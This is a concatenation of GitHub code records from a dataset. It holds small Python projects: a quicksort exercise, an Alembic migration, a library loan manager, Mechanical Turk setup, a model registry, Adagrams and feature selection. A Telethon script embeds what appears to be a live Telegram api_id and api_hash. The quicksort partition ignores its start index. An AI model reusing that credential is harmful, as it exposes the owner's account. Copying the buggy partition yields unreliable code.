Deletando a venda do banco de dados '''\n venda.delete()\n messages.success(request, 'Deletado com sucesso')\n return redirect('vendas')","repo_name":"JPAkira/Ez4Admin","sub_path":"apps/vendas/views/deletar_venda.py","file_name":"deletar_venda.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6664433356","text":"# 두 요소의 위치를 바꿔주는 helper function\r\ndef swap_elements(my_list, index1, index2):\r\n # 지난 실습의 코드를 여기에 붙여 넣으세요\r\n my_list[index1], my_list[index2] = my_list[index2], my_list[index1]\r\n \r\n return my_list\r\n\r\n# 퀵 정렬에서 사용되는 partition 함수\r\ndef partition(my_list, start, end):\r\n # 지난 실습의 코드를 여기에 붙여 넣으세요\r\n b = 0\r\n p = end\r\n for i in range(end): # 범위를 pivot 앞까지 봐야해서 range(end)로 구현\r\n if my_list[i] <= my_list[p]:\r\n swap_elements(my_list, i, b)\r\n b += 1\r\n \r\n swap_elements(my_list, p, b)\r\n p = b\r\n \r\n return p\r\n\r\n# 퀵 정렬 (start, end 파라미터 없이도 호출이 가능하도록 수정해보세요!)\r\ndef quicksort(my_list, start=0, end=None):\r\n # 지난 실습의 코드를 여기에 붙여 넣으세요\r\n if end == None:\r\n end = len(my_list) - 1\r\n \r\n # base case\r\n # quicksort 함수는 재귀적으로 호출되며, 파라미터 start와 end만 바뀔뿐, my_list는 변하지 않는다.\r\n if end - start < 1: # end - start == 0 (x)\r\n return # return None과 같은 효과\r\n \r\n p = partition(my_list, start, end)\r\n \r\n # pivot의 왼쪽 부분 정렬\r\n quicksort(my_list, start, p-1)\r\n \r\n \r\n # pivot의 오른쪽 부분 정렬\r\n quicksort(my_list, p+1, end)\r\n\r\n# 테스트 코드 1\r\nlist1 = [1, 3, 5, 7, 9, 11, 13, 11]\r\nquicksort(list1) # start, end 파라미터 없이 호출\r\nprint(list1)\r\n\r\n# 테스트 코드 2\r\nlist2 = [28, 13, 9, 30, 1, 48, 5, 7, 15]\r\nquicksort(list2) # start, end 파라미터 없이 호출\r\nprint(list2)\r\n\r\n# 테스트 코드 3\r\nlist3 = [2, 5, 6, 7, 1, 2, 4, 7, 10, 11, 4, 15, 13, 1, 6, 4]\r\nquicksort(list3) # start, end 파라미터 없이 호출\r\nprint(list3)\r\n","repo_name":"kipple99/Algorithm","sub_path":"Codeit/Algorithm Paradigm/detail_quicksort.py","file_name":"detail_quicksort.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39002244083","text":"\"\"\"empty message\n\nRevision ID: ea6764b46df4\nRevises: 61e049b8e58f\nCreate Date: 2016-05-03 16:36:16.322752\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'ea6764b46df4'\ndown_revision = '61e049b8e58f'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('CustomerGroup',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('parent_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['id'], ['Group.id'], ),\n sa.ForeignKeyConstraint(['parent_id'], ['Group.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('UserGroup',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['id'], ['Group.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('CustomerDataGroupMapping',\n sa.Column('customer_id', sa.Integer(), nullable=True),\n sa.Column('data_group_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['CustomerGroup.id'], ),\n sa.ForeignKeyConstraint(['data_group_id'], ['DataGroup.id'], )\n )\n op.create_table('CustomerProjectMapping',\n sa.Column('customer_id', sa.Integer(), nullable=True),\n sa.Column('project_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['CustomerGroup.id'], ),\n sa.ForeignKeyConstraint(['project_id'], ['Project.id'], )\n )\n op.create_table('CustomerSampleMapping',\n sa.Column('customer_id', sa.Integer(), nullable=True),\n sa.Column('sample_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['CustomerGroup.id'], ),\n sa.ForeignKeyConstraint(['sample_id'], ['Sample.id'], )\n )\n op.create_table('CustomerDataItemMapping',\n sa.Column('customer_id', sa.Integer(), nullable=True),\n sa.Column('data_item_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['CustomerGroup.id'], ),\n sa.ForeignKeyConstraint(['data_item_id'], ['DataItem.id'], )\n )\n op.drop_table('SampleToCustomer')\n op.drop_table('DataGroupToCustomer')\n op.drop_table('ProjectToCustomer')\n op.add_column('Group', sa.Column('type', sa.String(length=50), nullable=False))\n op.drop_constraint('Group_ibfk_1', 'Group', type_='foreignkey')\n op.drop_column('Group', 'parent_id')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Group', sa.Column('parent_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True))\n op.create_foreign_key('Group_ibfk_1', 'Group', 'Group', ['parent_id'], ['id'])\n op.drop_column('Group', 'type')\n op.create_table('ProjectToCustomer',\n sa.Column('project_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('customer_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['Customer.id'], name='ProjectToCustomer_ibfk_1'),\n sa.ForeignKeyConstraint(['project_id'], ['Project.id'], name='ProjectToCustomer_ibfk_2'),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n op.create_table('DataGroupToCustomer',\n sa.Column('data_group_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('customer_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['Customer.id'], name='DataGroupToCustomer_ibfk_1'),\n sa.ForeignKeyConstraint(['data_group_id'], ['DataGroup.id'], name='DataGroupToCustomer_ibfk_2'),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n op.create_table('SampleToCustomer',\n sa.Column('sample_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('customer_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['Customer.id'], name='SampleToCustomer_ibfk_1'),\n sa.ForeignKeyConstraint(['sample_id'], ['Sample.id'], name='SampleToCustomer_ibfk_2'),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n op.drop_table('CustomerDataItemMapping')\n op.drop_table('CustomerSampleMapping')\n op.drop_table('CustomerProjectMapping')\n op.drop_table('CustomerDataGroupMapping')\n op.drop_table('UserGroup')\n op.drop_table('CustomerGroup')\n ### end Alembic commands ###\n","repo_name":"JonathanCSmith/biocompute-dm","sub_path":"migrations/versions/ea6764b46df4_.py","file_name":"ea6764b46df4_.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23327506606","text":"import os\nfrom Repository import BooksRepository, LoanedBooksRepository, SubscribersRepository\nfrom Objects.BookObject import Book\nfrom Objects.LoanBooksObject import LoanedBook\nfrom Objects.SubscriberObject import Subscriber\n\nclass LoanAdministration:\n def __init__(self):\n self.AllLoanedBooksList = []\n self.AllSubscribersList = []\n allLoanedBooks = LoanedBooksRepository.readJson()\n allSubscribers = SubscribersRepository.readJson()\n for singleLoanedBook in allLoanedBooks:\n loanObject = LoanedBook(singleLoanedBook)\n self.AllLoanedBooksList.append(loanObject)\n for subscriber in allSubscribers:\n subscriberObject = Subscriber(subscriber)\n self.AllSubscribersList.append(subscriberObject)\n\n def ViewLoanAdministration(self, searchTerm = \"\"):\n if searchTerm != \"\":\n AllBooksView = list(filter(lambda x: searchTerm.lower() in (str(x.Id)+Book(x.Id_book).Title+Subscriber(x.Id_subscriber).Name+str(x.Returned)+x.DateRented+x.DateReturned).lower(), self.AllLoanedBooksList))\n else: \n AllBooksView = self.AllLoanedBooksList\n\n bookRowView = \"\"\n whiteSpaceToAddTitle, whiteSpaceToAddSubscriberName, whiteSpaceToAddDateRented, whiteSpaceToAddDateReturned = 0, 0, 0, 0\n\n for book in AllBooksView:\n bookObject = Book(book.Id_book)\n subscriberObject = Subscriber(book.Id_subscriber)\n if len(bookObject.Title) > whiteSpaceToAddTitle:\n whiteSpaceToAddTitle = len(bookObject.Title)\n if len(subscriberObject.Name) > whiteSpaceToAddSubscriberName:\n whiteSpaceToAddSubscriberName = len(subscriberObject.Name)\n if len(book.DateRented) > whiteSpaceToAddDateRented:\n whiteSpaceToAddDateRented = len(book.DateRented)\n if len(book.DateReturned) > whiteSpaceToAddDateReturned:\n whiteSpaceToAddDateReturned = len(book.DateReturned)\n\n for book in AllBooksView:\n bookObject = Book(book.Id_book)\n subscriberObject = Subscriber(book.Id_subscriber)\n if int(book.Id) > 9:\n whiteSpaceAfterId = \" \"*6\n else:\n whiteSpaceAfterId = \" \"*7\n \n whiteSpaceAfterTitle = (\" \" * (whiteSpaceToAddTitle-len(bookObject.Title)))\n whiteSpaceAfterSubscriberName = (\" \" * (whiteSpaceToAddSubscriberName-len(subscriberObject.Name)))\n whiteSpaceAfterDateRented = (\" \" * (whiteSpaceToAddDateRented-len(book.DateRented)))\n whiteSpaceAfterDateReturned = (\" \" * (whiteSpaceToAddDateReturned-len(book.DateReturned)))\n\n bookRowView += \"|| {}{}|| {}{}|| {}{}|| {}{}|| {}{}||\\n\".format(book.Id, whiteSpaceAfterId, \n bookObject.Title, whiteSpaceAfterTitle, \n subscriberObject.Name, whiteSpaceAfterSubscriberName, \n book.DateRented, whiteSpaceAfterDateRented,\n book.DateReturned, whiteSpaceAfterDateReturned)\n \n columnTitleFormatting = \"|| LoanId: || Book Title:{}|| Rented By:{}|| Date Rented:{}|| Date Returned:{}||\".format(\" \"*(whiteSpaceToAddTitle-11),\n \" \"*(whiteSpaceToAddSubscriberName-10),\n \" \"*(whiteSpaceToAddDateRented-12),\n \" \"*(whiteSpaceToAddDateReturned-14))\n\n print(\"=\"*len(columnTitleFormatting))\n print(columnTitleFormatting)\n print(bookRowView[:-1])\n print(\"=\"*len(columnTitleFormatting))\n\n def SearchBook(self):\n searchTerm = input(\"Voer een zoekterm in (op id, auteur, titel of genre): \")\n LoanAdministration.ViewLoanAdministration(self, searchTerm)\n\n def AddSubscriber(self, name, adress):\n newSubscriber = Subscriber.AddSubscriber(name, adress)\n self.AllSubscribersList.append(newSubscriber)\n\n def LoanBook(self, id_book, id_subscriber):\n newLoanedBook = LoanedBook.AddLoanedBook(id_book, id_subscriber)\n self.AllLoanedBooksList.append(newLoanedBook)\n\n def ReturnBook(self, id_loan):\n returnedLoanItem = LoanedBook(id_loan).ReturnLoanedBook()\n self.AllLoanedBooksList.append(returnedLoanItem)","repo_name":"LeroyJenkinss/analyse-PLS","sub_path":"Views/LoanAdministration.py","file_name":"LoanAdministration.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43798842387","text":"# from telethon import TelegramClient\nfrom telethon.sync import TelegramClient\n\napi_id = 12465126\napi_hash = '6f41fc346203d98715395048cff3e1eb'\n\nclient = TelegramClient('session_name', api_id, api_hash)\nclient.start()\n\nentity = client.get_entity('https://t.me/tass_agency')\nprint(entity.stringify()) #All paratmeters\nprint(entity.id)\nmsg = client.get_messages(entity.id, limit=10)\nprint(msg[7].stringify())\n\n","repo_name":"MADE-realtime/realtime_news","sub_path":"parser/parser/data_collection/tg_spider.py","file_name":"tg_spider.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14760316536","text":"# Parameter a is a list\ndef bubble_sort(a):\n for i in range(len(a) - 1):\n for j in range(len(a) - 1 - i):\n if a[j] > a[j+1]:\n a[j], a[j+1] = a[j+1], a[j]\n return a\n\n\ndef bubble_sort_better(a):\n unsorted = True\n decreasing_length = len(a) - 1\n while unsorted:\n unsorted = False\n for i in range(decreasing_length):\n if a[i] > a[i+1]:\n a[i], a[i+1] = a[i+1], a[i]\n unsorted = True\n decreasing_length -= 1\n return a\n\n\nlist = ['f', 'g', 'b', 'd', 'i', 'c', 'e', 'j', 'h', 'a']\nprint(bubble_sort(list))\nlist = ['f', 'g', 'b', 'd', 'i', 'c', 'e', 'j', 'h', 'a']\nprint(bubble_sort_better(list))\nlist = [9, 6, 2, 4, 8, 3, 5, 10, 7, 1]\nprint(bubble_sort(list))\nlist = [9, 6, 2, 4, 8, 3, 5, 10, 7, 1]\nprint(bubble_sort_better(list))\n","repo_name":"Potokar1/Python_Review","sub_path":"sorting_algorithms/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36216945450","text":"from pathlib import Path\n\nfrom constants import MTURK_DIR\nfrom easyturk import EasyTurk\nfrom mturk.mturk_util import ALL_HIDS\nfrom util import TIME\nimport json\n\nSANDBOX = False\nTEST_PERCENTAGE_MIN = 90\nPAST_ACCEPTANCE_PERCENTAGE_MIN = 95\nNB_HITS_MIN = 50\nDATA_PER_HIT = 9\nTITLE = f'Say whether one object in a scene \"causes\" another{TIME if SANDBOX else \"\"}'\nDESCRIPTION = f'Say whether you think intervening on the presence of an object in a scene would have' \\\n f' consequences on the probability of the presence of another object.' \\\n f'Takes a few minutes to check the explanation video and pass the qualification test,' \\\n f'and then each hit asks you to label {DATA_PER_HIT} pairs, ' \\\n f'where each pair probably takes about 10 seconds.'\nKEYWORDS = 'causation, image, objects'\nTIME_PER_HIT = 60*60 # One hour time\nAUTO_APPROVAL_DELAY = 60*60*24*7 # One week time before auto-approving\nREWARD = str(0.4)\n\n\ndef update_hit_types(cl,hitTypeId):\n for hid in ALL_HIDS:\n cl.update_hit_type_of_hit(\n HITId=hid,\n HITTypeId=hitTypeId\n )\n\n\ndef main():\n et = EasyTurk(sandbox=SANDBOX)\n cl = et.mtc\n response = create_hit_type(cl)\n hitTypeId = response['HITTypeId']\n update_hit_types(cl,hitTypeId)\n\n\ndef create_hit_type(cl):\n with open(Path(MTURK_DIR, f\"test_qualification_response{'_sandbox' if SANDBOX else ''}.json\"), \"r\") as f:\n response = json.loads(''.join(f.readlines()))\n test_qual_id = response['QualificationType']['QualificationTypeId']\n hit_type_args = {\n 'Title': TITLE,\n 'Description': DESCRIPTION,\n 'Keywords': KEYWORDS,\n 'AssignmentDurationInSeconds': TIME_PER_HIT,\n 'AutoApprovalDelayInSeconds': AUTO_APPROVAL_DELAY,\n 'QualificationRequirements': [\n {\n 'QualificationTypeId': '00000000000000000040',\n 'Comparator': 'GreaterThanOrEqualTo',\n 'IntegerValues': [NB_HITS_MIN]\n },\n # {\n # 'QualificationTypeId': '00000000000000000071',\n # 'Comparator': 'EqualTo' if len(countries) == 1 else 'In',\n # 'LocaleValues': [\n # {'Country': country} for country in countries\n # ],\n # },\n {\n 'QualificationTypeId': '000000000000000000L0',\n 'Comparator': 'GreaterThanOrEqualTo',\n 'IntegerValues': [PAST_ACCEPTANCE_PERCENTAGE_MIN],\n },\n {\n 'QualificationTypeId': test_qual_id,\n 'Comparator': 'GreaterThanOrEqualTo',\n 'IntegerValues': [TEST_PERCENTAGE_MIN]\n }\n ],\n 'Reward': REWARD\n }\n response = cl.create_hit_type(**hit_type_args)\n return response\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Natithan/p1_causality","sub_path":"mturk/update_hit_types.py","file_name":"update_hit_types.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"30292357770","text":"import logging\n\nfrom pkg_resources import iter_entry_points\n\nlogger = logging.getLogger(__name__)\n\n_REGISTRY = None\n\n\nclass Node:\n \"\"\"Models node in a tree in a forest.\"\"\"\n def __init__(self, model):\n \"\"\"Init the node\n\n :param model: Entity to represent\n :type model: class\n \"\"\"\n self.model = model\n self.parent = None\n self.parent_rel = None\n self.children = {}\n\n @property\n def label(self):\n \"\"\"Get label of model\n\n :return: Model label\n :rtype: str\n \"\"\"\n return self.model.label\n\n\nclass Forest:\n \"\"\"Collection of model trees.\n\n The root of a tree is a model with no parents.\n Each node in each tree contains references to children\n and to a parent.\n \"\"\"\n def __init__(self, models):\n \"\"\"Init the forest\n\n :param models: Dictionary of models keyed by label\n :type models: dict\n \"\"\"\n self.nodes = {}\n self.roots = []\n\n # Create nodes for models\n for model in models.values():\n self.nodes[model.label] = Node(model)\n\n # Create node mappings\n self.grow()\n\n # Find beginnings of trees\n self.find_roots()\n\n def grow(self):\n \"\"\"Establish relationships.\"\"\"\n for node in self.nodes.values():\n for relname, childmodel in node.model.children.values():\n self.nodes[childmodel.label].parent = node\n self.nodes[childmodel.label].parent_rel = relname\n node.children[relname] = self.nodes[childmodel.label]\n\n def find_roots(self):\n \"\"\"Find roots of trees.\n\n Roots are nodes with no parents.\n \"\"\"\n self.roots = []\n for node in self.nodes.values():\n if node.parent is None:\n self.roots.append(node)\n\n def path(self, label):\n \"\"\"Find path of a model with label.\n\n :param label: Label of model\n :type label: str\n :returns: List of (parent model label, relationship name) tuples\n :rtype: list|None\n \"\"\"\n target_node = self.nodes.get(label)\n if target_node is None:\n return None\n\n path = []\n current = target_node\n while current.parent is not None:\n path.append((current.parent, current.parent_rel))\n current = current.parent\n return [(n.label, r) for n, r in reversed(path)]\n\n def paths_from(self, label):\n \"\"\"Find all paths from a model with label.\n\n :param label: Label of model\n :type label: str\n :returns: List of paths from label\n :rtype: list\n \"\"\"\n visited = set()\n paths = []\n\n current_node = self.nodes.get(label)\n stack = [current_node]\n while (stack):\n current = stack[-1]\n visited.add(current)\n for rel_name, child_node in current.children.items():\n if child_node not in visited:\n stack.append(child_node)\n break\n else:\n if not current.children:\n paths.append([n.label for n in stack])\n stack.pop()\n return paths\n\n\nclass Registry:\n \"\"\"Model information about models.\"\"\"\n def __init__(self):\n \"\"\"Init the registry.\"\"\"\n self.models = {}\n self.load_models()\n self.forest = Forest(self.models)\n\n def load_models(self):\n \"\"\"Load installed models from entry points.\"\"\"\n for ep in iter_entry_points(group='cloud_snitch_models'):\n try:\n self.models[ep.name] = ep.load()\n except Exception:\n logger.warn(\n 'Unable to load cloud snitch model {}'.format(ep.name)\n )\n\n def identity_property(self, model):\n \"\"\"Return the identity property of a targeted model.\n\n :param model: Model name\n :type model: str\n :returns: Name of the model identity property or None\n :rtype: str|None\n \"\"\"\n klass = self.models.get(model)\n if klass is None:\n return None\n return klass.identity_property\n\n def state_properties(self, model):\n \"\"\"Return the state properties of a targeted model\n\n :param model: Model name\n :type model: str\n :returns: List of state properties or None\n :rtype: list|None\n \"\"\"\n klass = self.models.get(model)\n if klass is None:\n return None\n return sorted(klass.state_properties)\n\n def static_properties(self, model):\n \"\"\"Return the static properties of a model\n\n :param model: Model name\n :type model: str\n :returns: List of static properties or None\n :rtype: list|None\n \"\"\"\n klass = self.models.get(model)\n if klass is None:\n return None\n return sorted(klass.static_properties)\n\n def children(self, model):\n \"\"\"Return the children of a model\n\n :param model: Model name\n :type model: str\n :returns: List of children model names or None\n :rtype: list|None\n \"\"\"\n klass = self.models.get(model)\n if klass is None:\n return None\n return list(klass.children.keys())\n\n def modeldict(self, model):\n \"\"\"Return an json serializable dict describing the model.\n\n :param model: Name of the model\n :type model: str\n :returns: Dict describing model\n :rtype: dict|None\n \"\"\"\n klass = self.models.get(model)\n if klass is None:\n return None\n\n children = {}\n for name, childtuple in klass.children.items():\n children[name] = {\n 'rel_name': childtuple[0],\n 'label': childtuple[1].label\n }\n return dict(\n label=klass.label,\n state_label=klass.label,\n identity=klass.identity_property,\n static_properties=klass.static_properties,\n state_properties=klass.state_properties,\n children=children\n )\n\n def modeldicts(self):\n \"\"\"Get a list of all model dicts.\n\n :returns: List of model dicts\n :rtype: list\n \"\"\"\n dicts = []\n for model in self.models.keys():\n dicts.append(self.modeldict(model))\n return sorted(dicts, key=lambda x: x.get('label'))\n\n def properties(self, model=None):\n \"\"\"Gather list of properties for all models or a single model.\n\n :param model: Name of a targeted model\n :type model: str\n :returns: List of properties.\n :rtype: list\n \"\"\"\n prop_set = set()\n\n if model is None:\n models = self.models.keys()\n else:\n models = [model]\n\n for model in models:\n klass = self.models.get(model)\n if klass is not None:\n prop_set.add(klass.identity_property)\n for prop in klass.static_properties:\n prop_set.add(prop)\n for prop in klass.state_properties:\n prop_set.add(prop)\n\n return sorted(list(prop_set))\n\n def path(self, label):\n \"\"\"Get path of a label within forest.\n\n :param label: Model label\n :type label: str\n :returns: List of (label, relationship name) tuples\n :rtype: list|None\n \"\"\"\n return self.forest.path(label)\n","repo_name":"absalon-james/cloud_snitch","sub_path":"cloud_snitch/models/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74229477282","text":"from youtube_dl import YoutubeDL\n\naudio_downloader = YoutubeDL({'format': 'bestaudio'})\n\nwhile True:\n\n try:\n print('Youtube Downloader'.center(40, '_'))\n URL = input('Enter youtube url : ')\n audio_downloader.extract_info(URL)\n except Exception:\n print(\"Couldn\\'t download the audio\")\n finally:\n option = int(input('\\n1.download again \\n2.Exit\\n\\nOption here :'))\n\n if option != 1:\n break\n","repo_name":"python-geeks/Automation-scripts","sub_path":"music_downloader/music-downloader.py","file_name":"music-downloader.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":719,"dataset":"github-code","pt":"54"} +{"seq_id":"41865571599","text":"# 모든 옵션이 주어진 자동차를 구매하는데 필요한 액수를 계산해 주자.\n\n# 첫째 줄에 테스트 케이스의 개수가 주어진다.\n# 각 테스트 케이스의 첫 줄엔 자동차의 가격 s가 주어진다. (1 ≤ s ≤ 100 000)\n# 둘째 줄엔 해빈이가 구매하려고 하는 서로 다른 옵션의 개수 n이 주어진다. (0 ≤ n ≤ 1 000)\n# 뒤이어 n개의 줄이 입력으로 들어온다.\n# 각 줄은 q 와 p로 이루어져 있는데 q는 해빈이가 사려고 하는 특정 옵션의 개수이고 p는 해당 옵션의 가격이다. (1 ≤ q ≤ 100, 1 ≤ p ≤ 10 000)\n\nT = int(input())\n\nfor _ in range(T):\n s = int(input())\n n = int(input())\n price = s\n\n for _ in range(n):\n q, p = map(int, input().split())\n price += q * p\n\n print(price)\n","repo_name":"IDU-IFP/ifp-2022-restart-ok","sub_path":"soyiyeon/백준_9325번문제.py","file_name":"백준_9325번문제.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17680139307","text":"from ctypes.wintypes import WORD\nfrom operator import mul\nimport random\n\nLETTER_POOL = {\n 'A': 9, \n 'B': 2, \n 'C': 2, \n 'D': 4, \n 'E': 12, \n 'F': 2, \n 'G': 3, \n 'H': 2, \n 'I': 9, \n 'J': 1, \n 'K': 1, \n 'L': 4, \n 'M': 2, \n 'N': 6, \n 'O': 8, \n 'P': 2, \n 'Q': 1, \n 'R': 6, \n 'S': 4, \n 'T': 6, \n 'U': 4, \n 'V': 2, \n 'W': 2, \n 'X': 1, \n 'Y': 2, \n 'Z': 1\n}\n\nLETTER_VALUES = {\n 'A': 1, \n 'B': 3, \n 'C': 3, \n 'D': 2, \n 'E': 1, \n 'F': 4, \n 'G': 2, \n 'H': 4, \n 'I': 1, \n 'J': 8, \n 'K': 5, \n 'L': 1, \n 'M': 3, \n 'N': 1, \n 'O': 1, \n 'P': 3, \n 'Q': 10, \n 'R': 1, \n 'S': 1, \n 'T': 1, \n 'U': 1, \n 'V': 4, \n 'W': 4, \n 'X': 8, \n 'Y': 4, \n 'Z': 10 \n}\n\ndef draw_letters():\n '''\n (1-1) create letter bank from LETTER_POOL\n (1-2) letter cannot repeat greater than quantity of LETTER_POOL\n '''\n\n letters = []\n while len(letters) < 10:\n letter = random.choice(list(LETTER_POOL.keys()))\n if letters.count(letter) < LETTER_POOL[letter]:\n letters.append(letter)\n return letters\n\ndef uses_available_letters(word, letter_bank):\n '''\n (1) read letter from word (in list) from user\n (2) read letter_bank from the output of draw_letters()\n (3) check if each letter in the letter_bank\n '''\n\n letters = letter_bank.copy()\n word = word.upper()\n for letter in word:\n if letter in letters:\n letters.remove(letter)\n continue\n else:\n return False\n return True\n\ndef score_word(word):\n '''\n (1) letter in word\n (2) get the value from LETTER_VALUES (in dict)\n (3) add each value to score\n '''\n\n score = 0\n word = word.upper()\n for letter in word:\n score += LETTER_VALUES[letter]\n \n if len(word) > 6:\n score += 8\n\n return score\n\ndef get_highest_word_score(word_list):\n '''\n (1) dictionay of word:score\n (2) get word(s) in dict with highest score\n (3) convert (2) into tuple (requirement!)\n (4) list of multiple max scored words\n (5-1) if (4) is single: return the tuple of max scored word \n (5-2) if (4) is multiple: return winner\n (5-2-a) winner rule for multiple: with fewest number of letters unless 10 letters \n or if words have same number, then return first occurrence\n '''\n\n words_with_scores = {}\n for word in word_list:\n score = score_word(word)\n words_with_scores[word] = score\n \n highest_score_word = max(words_with_scores,key=words_with_scores.get) \n high_score = words_with_scores[highest_score_word]\n\n max_score_tuple = (highest_score_word, words_with_scores[highest_score_word])\n \n multiple_max_score_words = []\n for key in words_with_scores:\n if high_score == words_with_scores[key]:\n multiple_max_score_words.append(key)\n\n if len(multiple_max_score_words) == 1:\n return max_score_tuple\n else:\n for i in range(0, len(multiple_max_score_words)):\n if len(multiple_max_score_words[i]) == 10:\n return (multiple_max_score_words[i], words_with_scores[multiple_max_score_words[i]])\n elif len(multiple_max_score_words[i-1]) < len(multiple_max_score_words[i]):\n current_winner = (multiple_max_score_words[i-1], words_with_scores[multiple_max_score_words[i-1]]) \n else:\n current_winner = (multiple_max_score_words[i], words_with_scores[multiple_max_score_words[i]])\n\n return current_winner \n","repo_name":"1lynnj/adagrams-py","sub_path":"adagrams/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"6595760278","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn.linear_model import (\n Ridge,\n RidgeCV,\n ElasticNet,\n LassoCV,\n LassoLarsCV,\n LogisticRegression,\n)\nfrom sklearn.model_selection import cross_val_score\nfrom tqdm import tqdm\n\n\ndef pca_feature(train_feature, test_feature, n_components):\n pca = PCA(n_components=n_components)\n pca.fit(train_feature)\n train_feature_ = pd.DataFrame(\n pca.transform(train_feature),\n columns=[\"PCA_%s\" % (i + 1) for i in range(n_components)],\n )\n test_feature_ = pd.DataFrame(\n pca.transform(test_feature),\n columns=[\"PCA_%s\" % (i + 1) for i in range(n_components)],\n )\n return train_feature_, test_feature_, pca\n\n\ndef lasso_feature(train_feature, test_feature, train_label, C):\n model_lasso = LogisticRegression(\n penalty=\"l1\",\n solver=\"liblinear\",\n tol=1e-6,\n max_iter=int(1e6),\n warm_start=True,\n intercept_scaling=10000.0,\n C=C,\n )\n model_lasso.fit(train_feature, train_label)\n coef = pd.Series(np.abs(model_lasso.coef_.ravel().copy()), index=train_feature.columns)\n feature_columns = list(coef[coef != 0].index)\n return train_feature[feature_columns], test_feature[feature_columns], model_lasso\n\n\ndef iv_feature(\n train_feature,\n test_feature,\n train_label,\n interval_dict,\n cr_threshold,\n n_feature=None,\n):\n except_columns = []\n iv_dict = {}\n for column in tqdm(train_feature.columns):\n iv, IV, WOE, N_0_group, N_1_group = CalcIV(train_feature[column], train_label)\n try:\n intervals = interval_dict[column]\n except:\n except_columns.append(column)\n intervals = np.unique(train_feature[column])\n\n iv_dict[column] = {\"iv\": iv}\n if len(intervals) > len(N_1_group):\n intervals = intervals[-len(N_1_group) :]\n for i in range(len(intervals)):\n iv_dict[column][\"Bin%s\" % i] = {\n \"range\": intervals[i],\n \"positive\": N_1_group[i],\n \"negative\": N_0_group[i],\n \"WOE\": WOE[i],\n \"IV\": IV[i],\n }\n\n print(\"there is %s columns not in interval_dict \" % len(except_columns))\n print(except_columns)\n # there must be some calculation for this xxxx\n pd.DataFrame(iv_dict[column]).to_csv(\"../data/Bins/%s.csv\" % column)\n iv_df = pd.DataFrame(\n [{\"name\": key, \"IV\": value[\"iv\"]} for key, value in iv_dict.items()]\n )\n iv_df = iv_df.sort_values(\"IV\", ascending=False)\n cor_df = train_feature.corr()\n delete_high_corr_columns = []\n for column in iv_df[\"name\"]:\n if column not in delete_high_corr_columns:\n for column2 in iv_df[\"name\"]:\n if (\n cor_df.loc[column, column2] > 0.8\n and column != column2\n and column2 not in delete_high_corr_columns\n ):\n delete_high_corr_columns.append(column2)\n key_feature = []\n for name in iv_df[\"name\"]:\n if len(key_feature) >= 20:\n break\n if name not in delete_high_corr_columns:\n key_feature.append(name)\n return train_feature[key_feature], test_feature[key_feature], key_feature, iv_dict\n\n\ndef CalcIV(Xvar, Yvar):\n Xvar = Xvar.fillna(Xvar.mean())\n x_unique = np.unique(Xvar)\n N_0 = np.sum(Yvar == 0)\n N_1 = np.sum(Yvar == 1)\n N_0_group = np.zeros(x_unique.shape)\n N_1_group = np.zeros(x_unique.shape)\n for i in 